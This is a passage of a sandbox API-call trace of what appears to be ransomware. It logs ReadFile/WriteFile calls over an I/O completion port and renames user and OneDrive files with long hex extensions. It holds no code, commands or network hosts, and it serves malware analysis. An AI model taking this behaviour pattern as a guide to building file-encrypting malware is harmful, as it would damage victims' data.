lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.472] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.473] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\q1Zxk.mp4", lpString2=".DE58DBF6E26FD5E03B8C610FEBA224B391A59CA0914BCEBD369C08F221D4081A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\q1Zxk.mp4.DE58DBF6E26FD5E03B8C610FEBA224B391A59CA0914BCEBD369C08F221D4081A") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\q1Zxk.mp4.DE58DBF6E26FD5E03B8C610FEBA224B391A59CA0914BCEBD369C08F221D4081A" [0125.473] GetProcessHeap () returned 0x600000 [0125.473] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10a) returned 0x3155178 [0125.473] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x3155178, Length=0x10a, FileInformationClass=0xa) returned 0x0 [0125.474] CloseHandle (hObject=0x31c) returned 1 [0125.475] GetProcessHeap () returned 0x600000 [0125.475] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.475] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.556] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.562] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.563] WriteFile (in: hFile=0x328, lpBuffer=0x338e098*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60) returned 1 [0125.564] GetQueuedCompletionStatus (CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff) Thread: id = 118 os_tid = 0xa10 [0091.019] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0111.320] ReadFile (in: hFile=0x330, lpBuffer=0x32e82d8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x32c81a0 | out: lpBuffer=0x32e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x32c81a0) returned 1 [0111.320] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0111.343] WriteFile (in: hFile=0x334, lpBuffer=0x3310430*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32f02f8 | out: lpBuffer=0x3310430*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32f02f8) returned 1 [0111.344] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0111.449] WriteFile (in: hFile=0x334, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0111.449] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0111.455] ReadFile (in: hFile=0x318, lpBuffer=0x30e82d8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0) returned 1 [0111.455] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0111.456] WriteFile (in: hFile=0x318, lpBuffer=0x30e82d8*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0) returned 1 [0111.456] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0111.457] NtQueryObject (in: Handle=0x318, ObjectInformationClass=0x1, ObjectInformation=0x30c8250, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x30c8250, ReturnLength=0x25fff70) returned 0x0 [0111.458] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{530FA225-A741-4103-8238-7B3D9DE36F28} (0) - 3596 - winword.exe - OTeleMediumCost.dat", lpString2=".76D8F8B328E0B6B8BCE1C39A30F5FE13CB5A64A62D560E2123E5715A56DF8975" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{530FA225-A741-4103-8238-7B3D9DE36F28} (0) - 3596 - winword.exe - OTeleMediumCost.dat.76D8F8B328E0B6B8BCE1C39A30F5FE13CB5A64A62D560E2123E5715A56DF8975") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{530FA225-A741-4103-8238-7B3D9DE36F28} (0) - 3596 - winword.exe - OTeleMediumCost.dat.76D8F8B328E0B6B8BCE1C39A30F5FE13CB5A64A62D560E2123E5715A56DF8975" [0111.458] GetProcessHeap () returned 0x600000 [0111.458] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1de) returned 0x311bcd8 [0111.458] NtSetInformationFile (FileHandle=0x318, IoStatusBlock=0x25fff60, FileInformation=0x311bcd8, Length=0x1de, FileInformationClass=0xa) returned 0x0 [0111.460] CloseHandle (hObject=0x318) returned 1 [0111.461] GetProcessHeap () returned 0x600000 [0111.461] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0111.462] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0111.472] WriteFile (in: hFile=0x334, lpBuffer=0x31130f8, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 0x0 [0111.473] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0111.796] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x25fff70) returned 0x0 [0111.797] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\CollectOneDriveLogs.bat", lpString2=".27A1174E79F19AC8EFA02AEC0A385E70BFF87E0556D5B7989D63EE67A3205F42" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\CollectOneDriveLogs.bat.27A1174E79F19AC8EFA02AEC0A385E70BFF87E0556D5B7989D63EE67A3205F42") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\CollectOneDriveLogs.bat.27A1174E79F19AC8EFA02AEC0A385E70BFF87E0556D5B7989D63EE67A3205F42" [0111.797] GetProcessHeap () returned 0x600000 [0111.797] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x17c) returned 0x63b0f0 [0111.797] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x25fff60, FileInformation=0x63b0f0, Length=0x17c, FileInformationClass=0xa) returned 0x0 [0111.809] CloseHandle (hObject=0x334) returned 1 [0111.811] GetProcessHeap () returned 0x600000 [0111.811] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0111.811] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0111.833] WriteFile (in: hFile=0x328, lpBuffer=0x6a85c8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x688490 | out: lpBuffer=0x6a85c8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x688490) returned 1 [0111.833] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0111.922] WriteFile (in: hFile=0x334, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0111.923] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0111.932] ReadFile (in: hFile=0x330, lpBuffer=0x6a85c8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x688490 | out: lpBuffer=0x6a85c8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x688490) returned 1 [0111.932] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0111.969] WriteFile (in: hFile=0x330, lpBuffer=0x6a85c8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x688490 | out: lpBuffer=0x6a85c8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x688490) returned 1 [0112.018] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0112.019] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x25fff70) returned 0x0 [0112.020] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\FileSync.Resources.dll", lpString2=".CEB77C26C2A9A4BDFF1831AFACDDD3D7DD1B2DA9D60798575ED8D1E113E0E338" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\FileSync.Resources.dll.CEB77C26C2A9A4BDFF1831AFACDDD3D7DD1B2DA9D60798575ED8D1E113E0E338") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\FileSync.Resources.dll.CEB77C26C2A9A4BDFF1831AFACDDD3D7DD1B2DA9D60798575ED8D1E113E0E338" [0112.020] GetProcessHeap () returned 0x600000 [0112.020] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x17a) returned 0x63b278 [0112.020] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x25fff60, FileInformation=0x63b278, Length=0x17a, FileInformationClass=0xa) returned 0x0 [0112.023] CloseHandle (hObject=0x328) returned 1 [0112.224] GetProcessHeap () returned 0x600000 [0112.224] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.226] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0112.340] ReadFile (in: hFile=0x328, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0112.349] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0112.349] WriteFile (in: hFile=0x330, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0112.350] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0112.454] ReadFile (in: hFile=0x328, lpBuffer=0x680470, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x660338 | out: lpBuffer=0x680470*, lpNumberOfBytesRead=0x0, lpOverlapped=0x660338) returned 1 [0112.466] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0112.539] ReadFile (in: hFile=0x330, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0112.539] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0112.546] NtQueryObject (in: Handle=0x330, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x25fff70) returned 0x0 [0112.546] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\LoggingPlatform.dll", lpString2=".EE2786DBC94642741F28AB2CB0C5CD4B8908964576043CF73A840FB4F7D73C22" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\LoggingPlatform.dll.EE2786DBC94642741F28AB2CB0C5CD4B8908964576043CF73A840FB4F7D73C22") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\LoggingPlatform.dll.EE2786DBC94642741F28AB2CB0C5CD4B8908964576043CF73A840FB4F7D73C22" [0112.546] GetProcessHeap () returned 0x600000 [0112.546] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x174) returned 0x63b588 [0112.547] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x25fff60, FileInformation=0x63b588, Length=0x174, FileInformationClass=0xa) returned 0x0 [0112.552] CloseHandle (hObject=0x330) returned 1 [0112.554] GetProcessHeap () returned 0x600000 [0112.554] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.555] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0112.578] ReadFile (in: hFile=0x330, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0112.579] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0112.580] WriteFile (in: hFile=0x330, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0112.581] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0112.582] NtQueryObject (in: Handle=0x330, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x25fff70) returned 0x0 [0112.582] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\msvcp120.dll", lpString2=".91F4CE2A52E93D975A66A3E0731A9FB6340E966E0F4C26D93BC1C0800B9EC916" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\msvcp120.dll.91F4CE2A52E93D975A66A3E0731A9FB6340E966E0F4C26D93BC1C0800B9EC916") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\msvcp120.dll.91F4CE2A52E93D975A66A3E0731A9FB6340E966E0F4C26D93BC1C0800B9EC916" [0112.582] GetProcessHeap () returned 0x600000 [0112.582] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x166) returned 0x31876f8 [0112.583] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x25fff60, FileInformation=0x31876f8, Length=0x166, FileInformationClass=0xa) returned 0x0 [0112.592] CloseHandle (hObject=0x330) returned 1 [0112.593] GetProcessHeap () returned 0x600000 [0112.593] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.594] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0112.598] ReadFile (in: hFile=0x328, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0112.598] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0112.599] WriteFile (in: hFile=0x328, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0112.600] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0112.601] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x25fff70) returned 0x0 [0112.601] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\msvcr120.dll", lpString2=".ED5D45BCC4FA30AE5B22C26CC257BD2D92F57667F3B3C6AA0BD5384705E14047" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\msvcr120.dll.ED5D45BCC4FA30AE5B22C26CC257BD2D92F57667F3B3C6AA0BD5384705E14047") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\msvcr120.dll.ED5D45BCC4FA30AE5B22C26CC257BD2D92F57667F3B3C6AA0BD5384705E14047" [0112.601] GetProcessHeap () returned 0x600000 [0112.601] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x166) returned 0x3187868 [0112.601] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x25fff60, FileInformation=0x3187868, Length=0x166, FileInformationClass=0xa) returned 0x0 [0112.602] CloseHandle (hObject=0x328) returned 1 [0112.603] GetProcessHeap () returned 0x600000 [0112.603] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0112.605] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0112.743] ReadFile (in: hFile=0x328, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0112.743] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0112.744] WriteFile (in: hFile=0x328, lpBuffer=0x31130f8, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 0x0 [0112.750] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0112.751] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x25fff70) returned 0x0 [0112.751] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\RemoteAccess.dll", lpString2=".A926FDA2F4B3B509FAB5016F3D8490D7A33F98ABBCF94D7F98C64430C2A03E75" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\RemoteAccess.dll.A926FDA2F4B3B509FAB5016F3D8490D7A33F98ABBCF94D7F98C64430C2A03E75") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\RemoteAccess.dll.A926FDA2F4B3B509FAB5016F3D8490D7A33F98ABBCF94D7F98C64430C2A03E75" [0112.751] GetProcessHeap () returned 0x600000 [0112.751] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x16e) returned 0x3186ce0 [0112.751] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x25fff60, FileInformation=0x3186ce0, Length=0x16e, FileInformationClass=0xa) returned 0x0 [0112.752] CloseHandle (hObject=0x328) returned 1 [0112.752] GetProcessHeap () returned 0x600000 [0112.753] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.754] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0112.765] ReadFile (in: hFile=0x328, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: 